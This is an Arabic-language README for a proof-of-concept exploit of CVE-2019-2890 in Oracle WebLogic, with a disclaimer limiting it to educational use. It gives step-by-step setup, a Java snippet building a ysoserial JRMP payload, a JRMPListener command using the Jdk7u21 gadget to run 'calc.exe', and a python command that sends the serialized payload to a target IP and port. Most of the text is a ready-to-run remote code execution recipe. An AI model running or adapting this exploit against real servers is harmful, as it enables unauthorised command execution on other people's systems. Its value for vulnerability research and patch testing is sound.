
استغلال PoC لـ CVE-2019-2890 يستهدف Oracle WebLogic، باستخدام حمولة ysoserial JRMP لتنفيذ الأوامر عن بُعد عبر إزالة التسلسل للكائنات المسلسلة.
للاستخدام التعليمي والتواصل فقط، والمسؤولية عن أي استخدام آخر تقع على المستخدم.
تم استيراد ملفات jar ذات الصلة إلى المشروع، وتستخدم طريقة الاستغلال JRMP من yso، ويمكن تعديل طريقة الاستغلال أثناء التعلم والتصحيح.
أولاً، يجب وضع ملف SerializedSystemIni.dat الموجود ضمن weblogic في مجلد security.
ثم يجب إعادة تسمية yso إلى ysoserial.jar واستيراده إلى دليل lib.

ثانيًا، عنوان IP والمنفذ في getObject داخل ملف weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
أخيرًا، يتم الاستماع عن بُعد عبر JRMP وتنفيذ الأمر باستخدام 7u21.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
طريقة الاستخدام: قم بتشغيل Poc.java لإنشاء ملف التسلسل poc.ser، ثم استخدم الأمر:
python weblogic.py ip port poc.ser

